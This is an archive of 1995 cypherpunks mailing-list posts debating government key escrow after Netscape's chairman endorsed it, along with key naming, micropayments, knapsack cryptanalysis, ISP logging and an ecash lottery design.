Message-ID: <01HY987RZFD48WYZNO@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"cme@TIS.COM"  "Carl Ellison" 30-NOV-1995 12:34:35.18

Once an element of that set is identified, it can be assigned a codeword
(to make parsing easier).
----------
	How about an email address? Or a URL? Those can be autodetected easily
enough. Plus, the email one could be used to automatically use the
appropriate key if reading something from a particular address (whether for
decryption or for signature verification). If there are more than one with
that address, try all of them and if one turns up looking right (looks like
email headers, for instance) use that decryption. That last is even easier with
the signature verification, and that can show up the user-specified portion of
the field so as to remind you who's sent the message. Sorry if this has been
thought of (and suggested) before... it is kind of obvious.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 05:49:35 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape, Corporations, and GAK Support
Message-ID: <ace3561b10021004241f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:08 PM 11/30/95, hallam@w3.org wrote:
>Folks, lay of Netscape on this one. _EVERYONE_ is doing Terissa for the feds to
>use themselves. There are reporting requirements (FOI) which most people
>on this
>list seem to enjoy which make the privacy issue moot. There are other
>people who do
>not want to have non escrowed data flowing over their internal nets, nuclear
>installations etc.

Ah, but Jim Clark's comments were as follows, and indicate that the issue
is the _government_ reading _private Net communications_:

---section of interview or speech with/by Jim Clark of Netscape, emphasis
added by me---


To secure Net communications, the government will need to have access to
private data exchanges
                                  ^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
using what is known as a key escrow security system, said Clark. He added
that an invincible security system for the Net is possible, but such
asystem won't be built unless the government

^^^^^^^^^^
has a stake in it. "That's where key escrow comes in," said Clark.

Key escrow is a controversial security system advocated by the Clinton
administration that gives the government access to private Net
communications. It uses public key cryptography, a system
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
in which messages are coded and decoded using a set of private and public
keys. In key escrow, the private key is held by both the individual or
group and the government. The government can
                                                        ^^^^^^^^^^^^^^^^^^
use the key ostensibly to read messages for intelligence and national
security reasons.

---end of section---

This is not then just an issue of supporting voluntary key escrow for
corporations, nuclear installations, germ warfare labs, and the Church of
Scientology, this is GAK, pure and simple.

Phill, very few of us are opposed to the voluntary use of escrow schemes.
I, myself, would be interested in a robust system wherein my lawyer, for
example, could have a "duplicate key" to some of my files. We have
discussed this issue many times. Truly voluntary key escrow means that the
criteria described above by Jim Clark, that government access to private
communications is "where key escrow comes in," would be impossible to
achieve. Clearly, the type of key escrow being supported by Jim Clark,
Dorothy Denning, David Sternlight, Stuart Baker, and others is hardly
voluntary.

>Key escrow is not bad in itself. It is the idea that individuals be forced to
>use it for private conversations that is the bad idea.

Carefully read Jim Clark's direct quotes and the views attributed to him in
the article.

>
>If people want to argue "make the technology avaliable and it will be
>abused" then
>let them. Just remember that we normally argue the other side of the case.

No, the issue is that the proposal is explicitly GAK, not a voluntary
system. Details of deployment are of course murky, and this firestorm may
help to kill it for now, but the issue is clearly that Jim Clark is saying
the government needs to be able to read private communications and that key
escrow is needed. Given that he is the Chairman of Netscape, this is
worrisome.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an366601@anon.penet.fi (** CRAM **)
Date: Thu, 30 Nov 1995 22:23:45 +0800
To: cypherpunks@toad.com
Subject: call forwarding trick in Las Vegas
Message-ID: <9511301409.AA17120@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain




From: an453380@anon.penet.fi


Your cybercrime task forces and exotic examples sound very intriguing, 
however, here in Las Vegas, Nevada we have a situation that is exotic but not 
quite in the same way.  An "outcall" business has seemingly placed the 
telephone numbers of the major hotels into a Database along with the phone 
numbers of the local legal "outcall" services.  When a "guest" from a hotel 
calls to have an exotic dancer entertain him in his hotel room, his call is 
"call forwarded" from the service to which he called to allegedly  "S. E." and 
"R. S.".  The "call forwarding" process was accomplished by a Select Call 
Forwarding maneauver from "off premises" and was not authorized by the service 
which was "by-passed".  It seems no one much cares, (except the services from 
which the business was stolen), so this character is stealing to the tune of 
approximately $200,000.oo per week.  How long will it be until he taps into 
the banks, etc?  Does he pay taxes on his "full income"?  How can this 
maneauver be cancelled by the owners of the businesses from which are being 
stolen?  This guy is so brazen/stupid, he brags about "his accomplishment".

Any input would be much appreciated.

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 1 Dec 1995 04:03:51 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: Re: Attribute-testimony example (was Re: The future will be easy touse)
In-Reply-To: <01HY987RZFD48WYZNO@mbcl.rutgers.edu>
Message-ID: <9511301916.AA17069@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 30 Nov 1995 13:33 EDT
>From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>

>Once an element of that set is identified, it can be assigned a codeword
>(to make parsing easier).
>----------
>	   How about an email address? Or a URL? 

In this case, I was talking about an abbreviation for an attribute
rather than for a person --  e.g.,

	"checking-account: <number>,<bank>"

standing, for example, for

	"The person (entity) capable of signing with the signed-key 
identified above is authorized to withdraw money from checking account
number <number> at <bank>."


However, in offline mail I just had this interchange:

>>Date: Thu, 30 Nov 1995 12:47:28 -0500 (EST)
>>From: Jon Lasser <jlasser@rwd.goucher.edu>
>
>>Maybe it is just out of habit.  But there's another aspect, not looking 
>>at other people, but looking at oneself:
>>
>>"This is _my_ key."
>>
>>"But my name isn't on the key."
>>
>>"The key says I belong to it."
>>
>>"Hey!  I'm not just a number!"
>
>I think you're exactly right here.  That's the problem.
>
>Perhaps we need to include the person's name in the keyID.
>
>So instead of: 
>
>Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
>
>we could use:
>
>Signed-Key-ID: Carl Ellison (e05c601c4ec4af3aeb54a53171ed65da)
>

or

Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da (Carl Ellison)

to follow the SMTP example, or

Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da (Carl Ellison <cme@tis.com>)

to follow the PGP example.


In this case, the text attached to the key is optional -- but there for the
people who feel attached to their names.  It's left off (or replaced with a
handle) for folks who want anonymity.

The fact remains that the key is the source of authority here.  The name
acquires validity from the key, not the other way around, and that might
upset some people who bother to think about it.  However, those who prefer
to think the name is important can view the key hash as an added field
making the name unique -- with the extra added bonus of being tied strongly
to a public key.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML4CoVQXJENzYr45AQFvJQQAszQbHHIXlOVFpdBv3K/J6f3FmCBoSvhX
Fpy9T0OJAH2pndzH1cZLVTQzS+j/p4tY5P6YAlF+VS047T6jQqF31Kn1fIUlEjzw
0/t/W+7BQ+IktrrNtyJfEx5rFYKUg6rViTg3UF+knocBIMTRfm0EbuMkv7hCN5Ho
iE0n9FZ+XIc=
=e+iE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 1 Dec 1995 04:20:59 +0800
To: cypherpunks@toad.com
Subject: Netscape, Corporations, and GAK Support
Message-ID: <199511301940.OAA25768@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Picking up on Tim's and Atilla's comments on Netscape, GAK,
   a WTO czar and government regulation of security on the
   Net:

   Jim Clark's speech was probably a trial balloon, to see
   what the reaction would be. Remember that the NIST
   conference on KE is December 5.

   It would make sense for the corporations to welcome
   application of police power to handle threats to public
   order, in cyberworld like the other. That way they reduce
   culpability for failures of their private security systems,
   as they do on private real estate property.

   Key escrow requires someplace for the buck to stop beyond
   several private pitstops, and that is usually Uncle Sugar
   when no other party has the resources to withstand
   sustained, substantial, culture-wide risk -- as, say, in
   the financial realm. Internationally, the same need exists.

   Probably the corporations  would like to work in concert
   with governments on this, so no single firm, or nation,
   gets stigmatized, or wounded and prey to vultures -- as
   Netscape was with the brute hack, and as Microsoft and
   others have been with other attacks on their lightly
   guarded property, or as the US might be if it does not work
   out international agreements.

   Moreover, it has been noted here that government contracts
   are crucial for a new company -- for testing, for
   credibility, for prestige. All the major players already
   have such vital contracts -- indeed most would not have
   thrived without them -- so why would Netscape, and its 
   investors, not want them too?

   It's possible that Netscape was selected to sound off on KE
   to see if it could play with the Big Boys -- take the heat,
   pass initiation, qualify for the Bohemian Grove bear hugs
   of assured stability, growth and profits.
   
   Could be, though, that after getting stable R/E for his 
   backers, Jim will be confident enough to join Pixar in that 
   rhumba risk of mercurial, evanescent mass-marketers.

   That's not to be believed now at 7,000 times earnings.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Fri, 1 Dec 1995 07:33:08 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199511302245.OAA00266@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Speaking for me and not Netscape:

I am not in favor of governmental key escrow. Getting that news yesterday
made for the worst day I've had in a while. 

However, I think that history will look back on this period and snicker.
"They thought they could pull off key escrow? Yeah, right." I think that
things are going to get pretty ugly over the next few years, but ultimately,
it's too late. The genie's out of the bottle. 

I'm not going to say "Don't give up on Netscape." Do what you feel you should.

*I'm* not giving up on Netscape, however. We haven't adopted this as a
company position, and besides, I think I can do more good on the inside than
on the outside. 

In a related matter, there was talk a couple days back about creating a PGP
plug-in for Netscape Navigator. I've actually been thinking about that for a
couple months, but I make a much better writer than a programmer. (And if
you've ever read any of my books, keep your jokes to yourself.) Anyway, if
people out there are interested in doing the real work on such a product,
I'd be more than willing to help with the documentation, UI, and other
things where I have a modicum of talent. I'd also put a copy of it on my
home page and hype it internally.

In an unofficial capacity, natch.

Corey Bridges
Security Documentation Manager
Netscape Communications Corporation
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 1 Dec 1995 04:22:42 +0800
To: <cypherpunks@toad.com>
Subject: Re: WTO an even worse possibility as Inet regulator
In-Reply-To: <Pine.BSD.3.91.951130184221.7762G-100000@usr3.primenet.com>
Message-ID: <9511301947.AA05400@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>  a very credible white paper is circulating for the WTO to establish an 
>internet CZAR to regualate the Internet and level the playing field world 
>wide. 

>   personally, the Feds and the FCC are bad enough --now they want to 
>have a **global** bureaucracy play god  -???


Depends on what the role of the Czar is. If it is to stop sillyness like 
border disputes and keep national governments out of the loop then it
could be a good thing. If they want to regulate it is a bad thing.

WTO is mainly known for the GATT which they brokered. This is basically
an agreement amongst national governments to be "hands off" in their
tariff regulations. 

There is the potential for governments to regulate the Internet. It is
in everyone's interest to keep hands off but if one starts to regulate
then it is in others interests to regulate. The general soulution to
prisoners dilema games is to form some type of alliance. It is not
possible to form alliances in classical prisoners dilemas since they
are restricted to a single dilema at a time. Givernments are involved
with multiple dilemas and hence have multiple agreements. The main reason to
keeo a treaty is that the credibility of government depends on keeping 
treaties. Thus a treaty can solve a prisoners dilema problem since 
the gain from breaking one treaty is more than offset by the potential loss
through other sides abrogating other treaties.


I suspect that the role of an Internet Czar would be mainly ensuring that 
fat Internet pipes arrived throughout the third world. George Sorros has
been very active in this area, he paid for much of the infrastructure
development into Eastern Europe. If we could persuade Bill Gates that his 
mission in life was to cable Africa to the Internet somehow we might have the
whole planet online before 2000.

I would not be too worried about WTO banning crypto or attempting looney
tune ideas like insisting on OSI protocols. The UN generally does some very 
worthwhile work in allocating radio frequencies and such like and has done so 
for many years without problems. They allocate areas of the clarke belt for 
satelites and do all sorts of mundane tasks.


One of the odd things about power is that the larger the scale the more mundane 
the decisions. At the local level councillors decide to build or close schools 
and hospitals. At the global level negotiations are held on the size of holes in 
fishing nets and the exact specifications of ball bearings.

If people want to see the Federal government weakened in power the only way to 
do so is to make it ceed power both upwards and downwards. A national speed 
limit may be a bad idea (I personally think what was wrong was 55mph) but 
national standard roadsigns is a good idea. International standard roadsigns are 
a better idea still. 


		Phill.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 1 Dec 1995 04:45:49 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape, Corporations, and GAK Support
In-Reply-To: <199511301940.OAA25768@pipe9.nyc.pipeline.com>
Message-ID: <9511302008.AA05390@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Folks, lay of Netscape on this one. _EVERYONE_ is doing Terissa for the feds to
use themselves. There are reporting requirements (FOI) which most people on this 
list seem to enjoy which make the privacy issue moot. There are other people who do 
not want to have non escrowed data flowing over their internal nets, nuclear 
installations etc.

When I was involved in the site security area there was no way I would allow 
messages to be bouncing round the internal net which I could not read. They
might well be from trojan horses planted inside the net sending data out.

Key escrow is not bad in itself. It is the idea that individuals be forced to 
use it for private conversations that is the bad idea.


If people want to argue "make the technology avaliable and it will be abused" then
let them. Just remember that we normally argue the other side of the case.


		Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 1 Dec 1995 04:52:05 +0800
To: cypherpunks@toad.com
Subject: whither NetBill? (micropayments)
Message-ID: <Pine.SUN.3.91.951130152758.1025A-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



NetBill (http://www.ini.cmu.edu/netbill/) appears to be a great way for 
implementing micropayments.  Does anyone know what the deal is, or did 
Visa sign on just to keep it from happening?

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eamon Daly <eamon@cosc.canterbury.ac.nz>
Date: Fri, 1 Dec 1995 16:12:22 +0800
To: cypherpunks@toad.com
Subject: Knapsack-based cryptosystems
Message-ID: <199511300231.PAA21496@kiwi>
MIME-Version: 1.0
Content-Type: text/plain


Some convoluted questions for knowledgeable c'punks:

What's the state-of-the-art in cryptanalysis of knapsack-based
cryptosystems? I know the fate of Merkle-Hellman, Graham- Shamir
etc. as written by Brickell and Odlyzko in _Contemporary Cryptology_
(edited by Simmons). What of the Chor-Rivest cryptosystem (I'm aware
of the attack in Eurocrypt 95)? Finally, has any work been done on
cryptanalysis of the dense compact knapsack-based cryptosystem of
Glenn Orton? ("A Multiple-Iterated Trapdoor for Dense Compact Knapsacks"
in _Eurocrypt 94_)

Thanks for any information.

Eamon Daly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Fri, 1 Dec 1995 08:20:16 +0800
To: sameer <sameer@c2.org>
Subject: Re: "Got a subpoena?"
Message-ID: <v02120d03ace3efad2ed8@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 AM 11/30/95, sameer wrote:
>>
>> What about a court order to (a) start comprehensive logging, and (b) not
>> tell anyone under penalty of ______ .
>
>        Aren't court orders part of the public record? I don't quite
>know how this would work. I don't think they can keep me from telling
>people that I've started comprehensive logging, or at least keep it
>from being founnd out. (Legally, that is. I'm sure they could always
>use an approach like threatening to audit me every year, threatening
>my family, etc.)

In fact, most forms of recording need willing participation by at least one
party. Wiretaps are the main method of recording information which doesn't
involve willing participation of one of those communicating. Since there
are no laws regarding participation of service providers assisting the
government at gathering information, there is a great deal of leeway
legally.

If they actually pass a law (as in Penn) regarding ISP obligations it'll
probably be fought a bit, but does then put more stress on the situation.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 2 Dec 1995 11:33:23 +0800
To: cypherpunks@toad.com
Subject: key escrow compromise
Message-ID: <199511302339.PAA01778@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


to most on the list, the subject of this message would be an oxymoron.
("there is no compromise!")

regarding the recent Netscape brouhaha:

I tend to agree with Clark in only one regard: the government is going
to get into the key storage/retrieval business in some form or another
eventually & inevitably; it's just not stoppable. like one of the NSA 
spooks said after the Clipper fiasco, "well, we had to try". the aspect
that is up for grabs is whether these systems will be *mandatory* for
all private communication.

here's a quick idea. the post office is getting into 
certification authorization come hell or high water (ETA summer, 96). 
now, frankly I think this is a good thing. someday we will need some kind 
of legal agency to deal with citizen keys, so that we could have
cryptographic dealings with federal agencies such as the motor
vehicles department, etc. 

many are going to blast me to oblivion
for saying this, though. but don't you think there are some benign
government services that you would like to have access to via
your "state" or "legal identity" key? this would prevent other
people from faking your identity in front of the state, e.g. voter fraud,
and other miscellaneous things.

it seems to me the problem is when a government begins to insist
that the only authorized encryption you can use must be based on the
secret key they give you is where all the problems arise.

so, what we could advocate as a compromise (given that the post office
is absolutely not going to *not* get in this business, from what I can
tell). we encourage the idea of 

KEY FREEDOM

this would be a heading for the idea that we are in support of the (our)
government creating cryptographic infrastructures and key authentication
services, as long as we always have the total freedom to encrypt 
according to however we please in private communications.

in other words, we are willing to have an official state identity/key as
long as it is not required in our private transactions, only those involving
the state. (yes of course I know "state" is a pornographic word here, heh).
if you don't like this imagine it as a "stopgap measure" on the way toward
full cryptoanarchic infocalypse that government bureacrats might buy.

another idea is that we might reasonably support a system that has
such a thing as "key escrow" but we only use the keys they give us
as part of our signatures to other people if we want to reveal our
"official" state identity, not to encode the communication itself.
in this way someone else could verify your identity for e.g. legal/
contractual purposes, but the overall communication would remain private.

in other words, we agree that the government does have the authority
to link people to their "official numbers", but we have a choice about
when to use those official numbers in any private communication, and
by law businesses do not ever have to *require* authentication in this way. 
the numbers of course would be required in communication between the individual
and government.

the situation is that the government *now* requires that it knows who
we are when we communicate with it in any official context. therefore
I submit that the above system would not take away any rights, and in
fact might lead to privacy advocates being able to use a massive government
key-infrastructure but still retain communication privacy.  in other words,
you now have the government actually supporting your cryptographic 
freedom by giving you a massive "official" key distribution system you can 
use any way you like.

another possible compromise is that by default, keys would be insecure,
in the sense the government stores them for "key escrow" purposes,
but people are always recognized as having the right as "tunneled 
encryption" (a great term for private encryption within the state encryption).

you see, cypherpunks often recognize that most of the world is so clueless
that they don't protect themselves, and they almost don't deserve to have
privacy by the default if they are entirely clueless or apathetic about
obtaining. so what we might be able to accomplish is a system in which all
the clueless people use the government-supplied keys, the FBI cracks some
percentage of "clueless" criminal communication, and non-clueless people
go ahead and bypass it all.

now, before you hotly flame my eyebrows off,
I say these things not because I like key escrow, but that I suspect
the post office is going to move into certification no matter what, and
the idea of key escrow is closely related to that. with a little finetuning
the cypherpunk position could help define the actual rights of individuals
relative to these new government systems in a way that is totally 
compatible with all our core privacy beliefs.


what I am getting at is that we could twist the words "key escrow"
to mean that the government provides some infrastructure for storing
& accessing public keys (similar to phone books), and we could 
simultaneously vehemently deny that "key escrow" legitimately allows 
the government to actually *have* our secret keys.

in other words, we say, "yes we support key escrow. of course it is
a good idea to let the government have simple phonebooks of keys. oh,
wait, you mean we have to USE THESE KEYS? in the official STATE
ENCRYPTION ALGORITHM? we have to STAMP OUR SSN# ON EVERY TRANSACTION
WITH EVERY BUSINESS? sorry buster, what I do with
my key is my private matter. this would be again to having official
government phones that allowed the government to call any number
and start surveilling the room the phone is in."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 1 Dec 1995 08:39:10 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Moof! (Hettinga Speaks at Apple)
Message-ID: <199511302342.PAA12808@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Robert Hettinga wrote:

> God help us all.
> 
> I've been invited to the CyberDog Coding Retreat next week at Apple
> Computer in Cupertino. Getting flown out there is cool. Hanging with the
> more clueful Mac Internet types and getting to kibbitz and watch (I like to
> watch!) them code OpenDoc parts for the internet from 8AM to midnight plus,
> subsisting on Dew and Pizza is really way cool. Even getting some
> mac.cypherpunks in the door to code cypto parts is extremely cool. But...

Mountain Dew and Pizza??  Ohh, waita minutae ... this is California.

That means it's probably smoked salmon, with avocado and mayonnaise
pizza.  Yum.  Seriously though ... I'm green with envy.  

I'd love to attend something like this, but logistics would be a
nightmare.  First, I'd have to get clearance from the US government
for that.  And I think I'm on their "undesirable" list, and would need
to get some type of waiver to clear immigration.  Problems, eh??

I tried to call the Consul-General this afternoon, actually to inquire
about that and got put on perpetual hold and forced to listen to some
long recording.  Then I was told that if I wanted any information at
all, I should call a 1-900 number.

A 1-900 number??  Too rich for my blood.

I guess that Foggy Bottom, really is worried about their budget
issues, aren't they?  I guess they really want me to use my quarter
for pretty much everything.

> They've asked me to give a "talk". All by myself. In an auditorium. With an
> audience, I mean. With publicity. I feel like Hoffman in Rain Man...
> V-E-R-N, Verrrn... More to the point, I feel like I'm tempting fate,
> here...

Oh, I hate large groups, unless I have prepared text.

> Sooo. I've been told I can have friends in the audience. That's cool. As
> many friends as I want. That's even cooler. I can even have reinforcements
> up on the rostrum. That's extremely cool.

Cool.  About reinforcements on the rostrum.  

I know, I really wouldn't inspire any confidence in the audience, at all. 
I'd probably go off into some strange side track on the nuances of
something completely irrelevant and loose the entire audience while
talking.  I'm really one of those people that doesn't always have facts,
and figures, and symbols readily at hand.  It's a cognitive thing. 

Sort of like a database inquiry.

Alternatively, if I do focus on an issue.  YIKES!!  My Aunt Danielle
always warned me about my tendancy to use nuclear weapons when simple
artillery would suffice.  I tend to come on a "bit" heavy at times, unless
I actively self-censor.  It really is a constant battle on that front. 

> So, while I work on the "reinforcements up on the rostrum" part, *please*
> come and help me explain this stuff to the rest of the Apple community.

I'm really not sure I'd necessarily want to break "bad news" to
people, reinforcements or not.  I saw this yesterday, at a
presentation that I was at.  It was horrible, and I wasn't even
presenting.  I was in the audience -- an invited guest.  

I sorta kinda pissed on someone's campfire, and after that no-one
wanted to talk to me.  Shoot if looks could kill ...

I'd be worried about reputations and popularity, and what this all
means "long-term", beyond the time-line of the presentation.

I know that explaining some of this might severely limit future
opportunities.  I think I read that somewhere recently ... that
"consultants with blood on their hatchets" usually don't get very far. 

But it's your talk, I guess.  Just my $.02.

> Cryptoanarchy. Right here in Cupertino, folks.
> 
> See you there...



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 07:10:39 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape, Corporations, and GAK Support
Message-ID: <ace3709501021004c775@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:09 PM 11/30/95, Timothy C. May wrote:

>To secure Net communications, the government will need to have access to
>private data exchanges
>                                  ^^^^^^^^^^
>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


Sorry about the misaligned text and emphasis marks--it looked OK when I was
composing the message, but some hidden characters must've been present when
I cut-and-pasted the Clark text.

I think you all get the gist, though.

--Tim


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 1 Dec 1995 06:13:29 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <199511300621.WAA26406@netcom14.netcom.com>
Message-ID: <49l62m$4dl@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511300621.WAA26406@netcom14.netcom.com>,
Bill Frantz <frantz@netcom.com> wrote:
>At 20:38 11/29/95 -0800, Timothy C. May wrote:
>>Have to be _very_ careful here. A variety of scams can be developed which
>>show lots of "small" winners, but which fail to show any large winners. The
>>lottery operators can make a lot of extra bucks by simply not paying off
>>the large winnings, in various ways.
>
>With complete anonimity, the scam I would think of first is giving other
>nyms of myself all the big payoffs.
>
But with complete anonymity, no player knows who else is playing, let
alone who won.  So if you were going to pay off yourself, you may as well
just pay off no one.

The idea behind my proposal was that any participant can determine if he has
won.  The winning number (a hash of which was published beforehand, as in
a "bit commitment" scheme) is announced.  Anyone who picked a number
that, say, matched in the last digit, wins $2.  If you matched the
last two digits, you win $10, etc.  The house (without sacrificing
reputation) can't arrange who the big payoffs will go to, nor can it
(as I think Tim suggested) give out lots of small prizes and no big ones.

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 07:24:18 +0800
To: cypherpunks@toad.com
Subject: CyberDog?
Message-ID: <ace371a202021004069a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:16 PM 11/30/95, Vinnie Moscaritolo wrote:

>You know, one possible solution lies in the direction of Apple's CyberDog.
>It is based on OpenDoc and should be portable to windoze, I hate to say Rah
>told you so but...
>
>Even with all the ITAR silliness, even if on the contigincy that Apple
>can't provide a SSL or whatever in thier HTML part, YOU can always write
>your own HTML part, (its just not that complicated) in the Cyberdog
>environment and override the Apple CyberDog HTML part.
>
>This looks like a great opertunity for some Cypherpunks to write code, and
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>code that people DO care about.. a CypherPunk CyberDog part to replace the
>Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)

Go for it, Vinnie! Let us know how it works out. Being at Apple, I presume,
you're in a position to do what you suggest.

The problem of course is that many, many pieces of code "need" to be
written: several projects mentioned on this list frequently could use more
coders. Integrating the casual work of volunteers is usually hard to do.

If the idea is really a good one, and will result in an interesting
product, then probably the best approach is for someone to do more than
just volunteer some free time: he should set out to build a product he can
sell or at least get some recognition for. (A la Eudora, Stuffit, Red
Ryder, etc.)

I'm a Mac user, but am taking a wait-and-see approach to this "CyberDog"
(dumb name!) thing. If it works out, great. But until OpenDoc (and the
alphabet soup of object standards like Ole, Bento, DOE, SOM, etc.) appears
in real products and demonstrates usefulness, I don't see a rush of folks
moving from Windows and Unix platforms to the Mac to develop it.

If CyberDog is really a decent Web browser--and I've heard some good things
about it, admittedly from Macintosh partisans--then many of us will
probably use it.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 1 Dec 1995 07:06:02 +0800
To: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <v02110100ace3a9062ab4@[17.203.21.75]>
Message-ID: <Pine.SUN.3.91.951130162044.14431A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Vinnie Moscaritolo wrote:

> Even with all the ITAR silliness, even if on the contigincy that Apple
> can't provide a SSL or whatever in thier HTML part, YOU can always write
> your own HTML part, (its just not that complicated) in the Cyberdog
> environment and override the Apple CyberDog HTML part.
> 
> This looks like a great opertunity for some Cypherpunks to write code, and
> code that people DO care about.. a CypherPunk CyberDog part to replace the
> Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)

Well if we gonna go that way just use HotJava and create your own 
protocol and content handlers. They are d/l dynamicly. Just as an example.
Write a pop3 protoclos handlers, they use the URL 
pop3://mail.host.com/loginname to get your mail. Oh whats that? Someone
sent you a application/pgp message well guess they pgp content handler will
have to take care of that.

Its really a shame that Sun hasent released HotJava with the JDK it could
give netscape a sun for its money.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
